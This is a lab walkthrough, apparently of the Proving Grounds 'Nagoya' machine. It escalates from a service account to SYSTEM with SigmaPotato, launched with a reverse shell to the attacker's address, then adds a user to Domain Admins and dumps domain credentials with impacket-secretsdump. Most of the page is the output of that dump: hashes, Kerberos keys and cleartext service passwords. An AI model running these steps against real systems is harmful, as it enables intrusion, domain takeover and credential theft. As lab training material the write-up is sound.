InfoSec LAB

Nagoya_Privilege_Escalation

Created: 4 min read

SigmaPotato

The compromised svc_mssql account has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set that makes the target system vulnerable to the potato exploits. I will be using the newest potato exploit; SigmaPotato

This gaudy repository is a derivative of the GodPotato project, aiming to enhance the original work’s functionality and user-friendliness. With my bread-and-butter generally being PowerShell implementation and visual formatting, the primary focus is on enhancing PowerShell support and output verbosity for a more intuitive and effective user experience.

Exploit

Exploit binary is available online

Exploitation

*Evil-WinRM* PS C:\tmp> upload SigmaPotato.exe
 
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/nagoya/SigmaPotato.exe to C:\tmp\SigmaPotato.exe
Data: 84648 bytes of 84648 bytes copied
Info: Upload successful!

Delivery complete

PS C:\tmp> .\SigmaPotato.exe --revshell 192.168.45.220 1234
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 884 | Token: 0x800 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 968
[+] Current Command Length: 10 characters
---
[+] Creating a simple PowerShell reverse shell...
[+] IP Address: 192.168.45.220 | Port: 1234
[+] Bootstrapping to an environment variable...
[+] Payload base64 encoded and set to local environment variable: '$env:SigmaBootstrap'
[+] Environment block inherited local environment variables.
[+] New Command to Execute: 'powershell -c (powershell -e $env:SigmaBootstrap)'
[+] Setting 'CREATE_UNICODE_ENVIRONMENT' process flag.
---
[+] Creating Process via 'CreateProcessAsUserW'
[+] Process Started with PID: 2264
 
[+] Process Output:

Invoking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ nnc 1234    
listening on [any] 1234 ...
connect to [192.168.45.220] from (UNKNOWN) [192.168.158.21] 50446
 
PS C:\tmp> whoami
nt authority\system
PS C:\tmp> hostname
nagoya
PS C:\tmp> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.158.21
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.158.254

System Level Compromise

Hashdump

PS C:\tmp> net groups /DOMAIN "Domain Admins" /ADD andrea.hayes
The command completed successfully.

Making the andrea.hayes a DA

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Nagoya2023
[*] Saving ticket in andrea.hayes@nagoya.nagoya-industries.com.ccache

Updating the TGT

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache impacket-secretsdump NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -no-pass -k -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0x3382196796b8ecc982e9eb6e08fd3689
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b2abe041ab4571d97f0f75f60e8f3e6c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
NAGOYA-IND\NAGOYA$:plain_password_hex:fe9b6b59c1a324b1429ba88d6aa4c4b1db9b0ece5466597b34de6fabef0d419668c9ef542231d6ebf7669e78fb9c93fc8b6f854268938f751eb8d2403a5e8e8565e601ee9ad622a6115bb696fa5510d82a81e6b68e8caaf28b7033ead46189b2bec4dadff534ade3d359a83788e18081eaa1cf469d83dd5b842e6d96a338834ef59837d5291eba60170bacdb78061a2a200fa0669ba17da4a67329286bdf6fc9b63a66ed4a9d34d03224ea77ba97df3a961f9099043ce55017d40deff8a76d4d92e10c9820a0902097d70939eb1aee71268dd0bc839764cc410f55a7817673c76188a93e72d8f558935714e29880c409
NAGOYA-IND\NAGOYA$:aad3b435b51404eeaad3b435b51404ee:68f248e3840eb4a2fc2dea84c6711665:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe1dd393cc16630e90fbb2352d4490d745f82827c
dpapi_userkey:0x872cd7fe2ff527e70de1acd59083ec43d45c8aa1
[*] NL$KM 
 0000   92 97 EE 0C 4B B1 44 00  3D 42 69 32 09 B8 C4 07   ....K.D.=Bi2....
 0010   44 6B E9 2B 9A 64 D5 8D  D0 D5 83 4F BD BD 7B 81   Dk.+.d.....O..{.
 0020   4F F2 C8 DB B6 96 35 DD  24 BD B6 3C 32 0F F8 20   O.....5.$..<2.. 
 0030   12 9D 5D 0D A0 DC 26 2E  B1 97 69 1B 26 10 AB B4   ..]...&...i.&...
NL$KM:9297ee0c4bb144003d42693209b8c407446be92b9a64d58dd0d5834fbdbd7b814ff2c8dbb69635dd24bdb63c320ff820129d5d0da0dc262eb197691b2610abb4
[*] _SC_MSSQL$SQLEXPRESS 
NAGOYA-IND\svc_mssql:Service1
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:be053fe612071239ce83eb7f3e713e5e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7832dd690f45592bbd6ef149a241437f:::
nagoya-industries.com\svc_helpdesk:1104:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
nagoya-industries.com\Matthew.Harrison:1106:aad3b435b51404eeaad3b435b51404ee:cdef2d7babceaf377748b9e9e2054a9c:::
nagoya-industries.com\Emma.Miah:1107:aad3b435b51404eeaad3b435b51404ee:70b6eb7160d06976036495dc285aefac:::
nagoya-industries.com\Rebecca.Bell:1108:aad3b435b51404eeaad3b435b51404ee:4b3cf0d5483d8837fa36ec0a7b3409dc:::
nagoya-industries.com\Scott.Gardner:1109:aad3b435b51404eeaad3b435b51404ee:7fb6631bf15cc140780d84946a3cc99f:::
nagoya-industries.com\Terry.Edwards:1110:aad3b435b51404eeaad3b435b51404ee:03cd3c965d73db3ac48d6c4ef877ead8:::
nagoya-industries.com\Holly.Matthews:1111:aad3b435b51404eeaad3b435b51404ee:cf77ece7479e87cc208f614e977468e8:::
nagoya-industries.com\Anne.Jenkins:1112:aad3b435b51404eeaad3b435b51404ee:2d375452ccf6786ba6dd055793d8ca26:::
nagoya-industries.com\Brett.Naylor:1113:aad3b435b51404eeaad3b435b51404ee:4c3eed1b73ae4ec2a99332e19ad7ea72:::
nagoya-industries.com\Melissa.Mitchell:1114:aad3b435b51404eeaad3b435b51404ee:c6e29bdfcd200bb0ef8d5f97f33eebe6:::
nagoya-industries.com\Craig.Carr:1115:aad3b435b51404eeaad3b435b51404ee:a243ea0a666107e5946362230e328cf3:::
nagoya-industries.com\Fiona.Clark:1116:aad3b435b51404eeaad3b435b51404ee:4210e68078724566518b8ad3f197a4a6:::
nagoya-industries.com\Patrick.Martin:1117:aad3b435b51404eeaad3b435b51404ee:fea98fdcaeaa8fe1b05b0b887c164160:::
nagoya-industries.com\Kate.Watson:1118:aad3b435b51404eeaad3b435b51404ee:463aa1bc61aaa82f3e96bfbd6e23d251:::
nagoya-industries.com\Kirsty.Norris:1119:aad3b435b51404eeaad3b435b51404ee:4c51dda472c22277ff955344f8dd0715:::
nagoya-industries.com\Andrea.Hayes:1120:aad3b435b51404eeaad3b435b51404ee:e28b09f10d787e534028150180e99cd5:::
nagoya-industries.com\Abigail.Hughes:1121:aad3b435b51404eeaad3b435b51404ee:925acb9146d8bab160fe054b7449e99b:::
nagoya-industries.com\Melanie.Watson:1122:aad3b435b51404eeaad3b435b51404ee:f5a75b689009e3eb9a0a4e34acf6a065:::
nagoya-industries.com\Frances.Ward:1123:aad3b435b51404eeaad3b435b51404ee:bf91eea6aa6c765e402b90dbf68bed1e:::
nagoya-industries.com\Sylvia.King:1124:aad3b435b51404eeaad3b435b51404ee:e34416f69e85113fe02e628896be1a96:::
nagoya-industries.com\Wayne.Hartley:1125:aad3b435b51404eeaad3b435b51404ee:fa1f9da3316963c4f4413fcf37ed33ad:::
nagoya-industries.com\Iain.White:1127:aad3b435b51404eeaad3b435b51404ee:7c751148821f2ea8423a5c039908e41a:::
nagoya-industries.com\Joanna.Wood:1128:aad3b435b51404eeaad3b435b51404ee:a18bef63cf85f7fca7313f615242f859:::
nagoya-industries.com\Bethan.Webster:1129:aad3b435b51404eeaad3b435b51404ee:3ccfe5223bd98fa4bcd0302599e16e91:::
nagoya-industries.com\Elaine.Brady:1131:aad3b435b51404eeaad3b435b51404ee:02bb09436c6be0a45da873ea1bfcfb92:::
nagoya-industries.com\Christopher.Lewis:1132:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
nagoya-industries.com\Megan.Johnson:1133:aad3b435b51404eeaad3b435b51404ee:988c9bf6d8b45464833313a5da854b06:::
nagoya-industries.com\Damien.Chapman:1134:aad3b435b51404eeaad3b435b51404ee:8b38b80ffa907c6afcb66c1c77b3c7bb:::
nagoya-industries.com\Joanne.Lewis:1135:aad3b435b51404eeaad3b435b51404ee:25f93cc3c402a326bdd5f8d8eaff83ee:::
nagoya-industries.com\svc_mssql:1136:aad3b435b51404eeaad3b435b51404ee:e3a0168bc21cfb88b95c954a5b18f57c:::
nagoya-industries.com\svc_tpl:1137:aad3b435b51404eeaad3b435b51404ee:11b285bdbd7a183df975f7603c7c815a:::
nagoya-industries.com\svc_web:1138:aad3b435b51404eeaad3b435b51404ee:e3a0168bc21cfb88b95c954a5b18f57c:::
NAGOYA$:1000:aad3b435b51404eeaad3b435b51404ee:68f248e3840eb4a2fc2dea84c6711665:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:7fd429f43154e68bab3499b37c7d8f02770a181d6170783ef5da6d630ee309b5
Administrator:aes128-cts-hmac-sha1-96:2e8b7cac6087fa931a7d0568155518fb
Administrator:des-cbc-md5:fb04374ac7cba176
krbtgt:aes256-cts-hmac-sha1-96:70281d1375db6740d7c3f8b7fd546918d57983be4bd2fc09cdd6841b9859503c
krbtgt:aes128-cts-hmac-sha1-96:11443a0bead45c28b7c3090fe1e08e31
krbtgt:des-cbc-md5:19d5198046d6945d
nagoya-industries.com\svc_helpdesk:aes256-cts-hmac-sha1-96:07bd5d560a995c3de0f90850335ce61245e5df5c25d979f7077fb8bc21437151
nagoya-industries.com\svc_helpdesk:aes128-cts-hmac-sha1-96:9af7dae9e032879b384e00deb7ba32aa
nagoya-industries.com\svc_helpdesk:des-cbc-md5:ba6820c7ea52eac7
nagoya-industries.com\Matthew.Harrison:aes256-cts-hmac-sha1-96:229f457184018bb938ab8cfe8e44613b7caf977c43e7130d478a8439ad70b99d
nagoya-industries.com\Matthew.Harrison:aes128-cts-hmac-sha1-96:19bde1f526cf12168750d98c6921bb46
nagoya-industries.com\Matthew.Harrison:des-cbc-md5:85f794a764c18c08
nagoya-industries.com\Emma.Miah:aes256-cts-hmac-sha1-96:367e4daeec5fce416a2f3351b0583e19beb8fe41adc70e3e758364c6d79f7205
nagoya-industries.com\Emma.Miah:aes128-cts-hmac-sha1-96:36617ff6028ad3fdf54837633169f7ff
nagoya-industries.com\Emma.Miah:des-cbc-md5:450b8f79b9feab7a
nagoya-industries.com\Rebecca.Bell:aes256-cts-hmac-sha1-96:540eafd3bccaa011e84fd63c4a19de75cbda0a68b6f63217274f39a75f4a0138
nagoya-industries.com\Rebecca.Bell:aes128-cts-hmac-sha1-96:d5caeb4102998c6cec9ce6e731ecd23f
nagoya-industries.com\Rebecca.Bell:des-cbc-md5:c1a252911c9479ab
nagoya-industries.com\Scott.Gardner:aes256-cts-hmac-sha1-96:b7f1119e25567b8345eccea405a6820f178c73aa6fe07adfe5a27412fe9fe928
nagoya-industries.com\Scott.Gardner:aes128-cts-hmac-sha1-96:42219a98292cc2a6a08aa98fbbecf75f
nagoya-industries.com\Scott.Gardner:des-cbc-md5:8f764ad6c8c48043
nagoya-industries.com\Terry.Edwards:aes256-cts-hmac-sha1-96:3582ae75d98d03ce1afe71a8842f47a59dc00b4b7850f25251a48e294ca393f3
nagoya-industries.com\Terry.Edwards:aes128-cts-hmac-sha1-96:5cfc5a9e774cfb1ae4189ff38644cb7c
nagoya-industries.com\Terry.Edwards:des-cbc-md5:ad943115b5bcb373
nagoya-industries.com\Holly.Matthews:aes256-cts-hmac-sha1-96:bb89c14a14f20aa7cc5675722f85ba4b0bb8bffc830e3e812949c898c2685bd6
nagoya-industries.com\Holly.Matthews:aes128-cts-hmac-sha1-96:0b5063bb904c43f187d94c9b2fc8670f
nagoya-industries.com\Holly.Matthews:des-cbc-md5:fd0dc2104c4f70cb
nagoya-industries.com\Anne.Jenkins:aes256-cts-hmac-sha1-96:1691e5fa081a926345053cf29802ef778ca07ca2d2236d0cdf3d0d805c0131f4
nagoya-industries.com\Anne.Jenkins:aes128-cts-hmac-sha1-96:7bdb20cdd9597d802b6be708ca879c2f
nagoya-industries.com\Anne.Jenkins:des-cbc-md5:13da98688a10a8e5
nagoya-industries.com\Brett.Naylor:aes256-cts-hmac-sha1-96:691b110fb678ba165b671deca3b09dc1bd92e6a39baa9a30ceae1ee3178f8b92
nagoya-industries.com\Brett.Naylor:aes128-cts-hmac-sha1-96:3687df112a2ee3d50af63d19cebb5bdc
nagoya-industries.com\Brett.Naylor:des-cbc-md5:9e576d029767e0b5
nagoya-industries.com\Melissa.Mitchell:aes256-cts-hmac-sha1-96:3f3c2e6c28339dde0224fcbb066d6338c0adfb9d832b9d5fa22525dba8cebdd0
nagoya-industries.com\Melissa.Mitchell:aes128-cts-hmac-sha1-96:e24b67aef911c74addbc5607c435f5c7
nagoya-industries.com\Melissa.Mitchell:des-cbc-md5:ce5b319176f238b3
nagoya-industries.com\Craig.Carr:aes256-cts-hmac-sha1-96:2dc85710ba4a976aa59a18ae0021243c931f4530db32da8423f71845c670d1e3
nagoya-industries.com\Craig.Carr:aes128-cts-hmac-sha1-96:5904d39556527ebc462660ca466fed4d
nagoya-industries.com\Craig.Carr:des-cbc-md5:43a4077a3da168bf
nagoya-industries.com\Fiona.Clark:aes256-cts-hmac-sha1-96:6b40b7b75456fdf4cc67afd101f62cbbac872ab232a430475d58e2dd7392b797
nagoya-industries.com\Fiona.Clark:aes128-cts-hmac-sha1-96:4669b502aab4024e25bc4213f9d0b30d
nagoya-industries.com\Fiona.Clark:des-cbc-md5:c84cd3dab9029494
nagoya-industries.com\Patrick.Martin:aes256-cts-hmac-sha1-96:4ce931e981535a7845b83466b5cd100b5137853e6bf1f325b19f9fa7ee10d690
nagoya-industries.com\Patrick.Martin:aes128-cts-hmac-sha1-96:242e282153189a74e0175caee535ee1d
nagoya-industries.com\Patrick.Martin:des-cbc-md5:d00713899b5ddc4c
nagoya-industries.com\Kate.Watson:aes256-cts-hmac-sha1-96:51401fa5eb6c68ab3fb6e6d842a218468350a36ba2849e8b0ad37d65aefc9f6a
nagoya-industries.com\Kate.Watson:aes128-cts-hmac-sha1-96:70625c640a4f47aed12bb387aa8a7f43
nagoya-industries.com\Kate.Watson:des-cbc-md5:d56da42cf4c458ce
nagoya-industries.com\Kirsty.Norris:aes256-cts-hmac-sha1-96:a994f5b04dcc4195efd342caca5e1a6f43afe04cc211c2e418af63cab03b111c
nagoya-industries.com\Kirsty.Norris:aes128-cts-hmac-sha1-96:0fd9a8857737ce31d3d638698dfae2d1
nagoya-industries.com\Kirsty.Norris:des-cbc-md5:e68c29707519b56b
nagoya-industries.com\Andrea.Hayes:aes256-cts-hmac-sha1-96:98838183b41645de098351f3dc395f4b522f09c0f526b62f010a53bf6d078f7a
nagoya-industries.com\Andrea.Hayes:aes128-cts-hmac-sha1-96:453f528ccaa3997b3a08ccb91b185dd3
nagoya-industries.com\Andrea.Hayes:des-cbc-md5:ad6dc89b9dc72052
nagoya-industries.com\Abigail.Hughes:aes256-cts-hmac-sha1-96:72b336e33845c75fb2f47db0a4452b0139d0691b8191ee415eabdb88ed80a751
nagoya-industries.com\Abigail.Hughes:aes128-cts-hmac-sha1-96:7542b68e2b9c1d24f1594361e23b9583
nagoya-industries.com\Abigail.Hughes:des-cbc-md5:ec7520620d94c220
nagoya-industries.com\Melanie.Watson:aes256-cts-hmac-sha1-96:ac68a5fd5b93abba7172a7e723896c56f0e3d05510176f84b20f6570f1b09a78
nagoya-industries.com\Melanie.Watson:aes128-cts-hmac-sha1-96:31af0e2d5de8bdee1141a47fe5ca2427
nagoya-industries.com\Melanie.Watson:des-cbc-md5:1504d3322c26c49b
nagoya-industries.com\Frances.Ward:aes256-cts-hmac-sha1-96:9d13efa395a9c7e0a768f8f431428fc964fe41f86664456b85fc08bdbe24a49a
nagoya-industries.com\Frances.Ward:aes128-cts-hmac-sha1-96:b98d3efd98f33a6d658bb22f8ae893d8
nagoya-industries.com\Frances.Ward:des-cbc-md5:bc1fe6e3613dbf61
nagoya-industries.com\Sylvia.King:aes256-cts-hmac-sha1-96:36701651608403f60a035f84d20f427366d194903a60bf869f3d9cd3f0bf8327
nagoya-industries.com\Sylvia.King:aes128-cts-hmac-sha1-96:d272393568995687f5c36576647aabd8
nagoya-industries.com\Sylvia.King:des-cbc-md5:efadbc37d085168a
nagoya-industries.com\Wayne.Hartley:aes256-cts-hmac-sha1-96:3b0606095efdd44395f3f9f496f8b41da63ce85df61afa146aa4596b670838b0
nagoya-industries.com\Wayne.Hartley:aes128-cts-hmac-sha1-96:748ce62186bbf41d3744d15af52cd031
nagoya-industries.com\Wayne.Hartley:des-cbc-md5:681c106185cea48f
nagoya-industries.com\Iain.White:aes256-cts-hmac-sha1-96:bbf3740eb8a8d293df6a81ca43dcd91ad7e2854d5818423b182df610ddacd906
nagoya-industries.com\Iain.White:aes128-cts-hmac-sha1-96:f8e63ac45524faee66a46eec1abe02bf
nagoya-industries.com\Iain.White:des-cbc-md5:bcdc8acb25ce687f
nagoya-industries.com\Joanna.Wood:aes256-cts-hmac-sha1-96:8b6c28c596978ee1fa19c4b91efcf8ad567a0f407d7f758341131ed35ba35d4a
nagoya-industries.com\Joanna.Wood:aes128-cts-hmac-sha1-96:fc8230e573199925ccc3ac9b4282adae
nagoya-industries.com\Joanna.Wood:des-cbc-md5:2c10b634459176da
nagoya-industries.com\Bethan.Webster:aes256-cts-hmac-sha1-96:9f711dcdb02befc00e32d2f3ff6e1fcc532b53f2b173c44e1eac09eed487f5af
nagoya-industries.com\Bethan.Webster:aes128-cts-hmac-sha1-96:4ab2c86eac4064af23a49b050f209e5a
nagoya-industries.com\Bethan.Webster:des-cbc-md5:d5bc3820e3971fbc
nagoya-industries.com\Elaine.Brady:aes256-cts-hmac-sha1-96:35a303fca00c996b507f43ffbffeac6f5c420c3347c28ed9c27814e137357b84
nagoya-industries.com\Elaine.Brady:aes128-cts-hmac-sha1-96:6276bcdf2e4a2fcfb5a84602dfe19c8d
nagoya-industries.com\Elaine.Brady:des-cbc-md5:91b06be3add092e5
nagoya-industries.com\Christopher.Lewis:aes256-cts-hmac-sha1-96:8466d7e8fb657dc66f18b85fd1674d5fd1f53fe2e0e404471c5f12b877c58c31
nagoya-industries.com\Christopher.Lewis:aes128-cts-hmac-sha1-96:ca03b3205acf69dd006786ff5aa1ee3b
nagoya-industries.com\Christopher.Lewis:des-cbc-md5:d5b362b0373dc77c
nagoya-industries.com\Megan.Johnson:aes256-cts-hmac-sha1-96:0e1d491b250982e7dbe982614205aa41696abaa56cd3c8757e7b561a022045d8
nagoya-industries.com\Megan.Johnson:aes128-cts-hmac-sha1-96:10c774b92a87d9f8a105bd70c0755cf4
nagoya-industries.com\Megan.Johnson:des-cbc-md5:ea52754958918fa1
nagoya-industries.com\Damien.Chapman:aes256-cts-hmac-sha1-96:7eb1bbf51ffaffc19e87567cbab9d504d0318c76315268619cb13117b1cde2f1
nagoya-industries.com\Damien.Chapman:aes128-cts-hmac-sha1-96:617daf25d83ae2f1d8a65f0a881fbf28
nagoya-industries.com\Damien.Chapman:des-cbc-md5:6b7092643bf75719
nagoya-industries.com\Joanne.Lewis:aes256-cts-hmac-sha1-96:8bbb1c5cff282e5974d8f79d2e3e2c76eb23147561145a4fa4794a49b64fd919
nagoya-industries.com\Joanne.Lewis:aes128-cts-hmac-sha1-96:c3a8607d756692e1fb5504409e8f1ca6
nagoya-industries.com\Joanne.Lewis:des-cbc-md5:973da70ddfb3ae37
nagoya-industries.com\svc_mssql:aes256-cts-hmac-sha1-96:24d73dd98ef15bf04acf5d3feb6741350d4011268aac268935bdde1ad463b05b
nagoya-industries.com\svc_mssql:aes128-cts-hmac-sha1-96:42efde8c2cf59d161003833d776c6dd7
nagoya-industries.com\svc_mssql:des-cbc-md5:5854376b54dff7b3
nagoya-industries.com\svc_tpl:aes256-cts-hmac-sha1-96:efc3f14c53cc66b2db4918d600e6cfa98c253451f3cc0c9475f97819b02722c0
nagoya-industries.com\svc_tpl:aes128-cts-hmac-sha1-96:78023975e67da0fb2532b83a98618dd0
nagoya-industries.com\svc_tpl:des-cbc-md5:d6bc2f167f290d01
nagoya-industries.com\svc_web:aes256-cts-hmac-sha1-96:4e36b24e3c609ab25906187884e90487411fccb19d8e0b116de94b6e5b8e1be8
nagoya-industries.com\svc_web:aes128-cts-hmac-sha1-96:db9f5054d7d1174bc62227003fd8c1d3
nagoya-industries.com\svc_web:des-cbc-md5:98dc94686d75e9bf
NAGOYA$:aes256-cts-hmac-sha1-96:cf78d7b86570f4639e153baf8bd1367c6d0550bf406f32b33e7ff6ae7e04a5ee
NAGOYA$:aes128-cts-hmac-sha1-96:c04b289ec402286ed7be3c6dbe160158
NAGOYA$:des-cbc-md5:8c70fde98ff2fb8c
[*] Cleaning up...

Domain level compromise

Interactive Graph View

Backlinks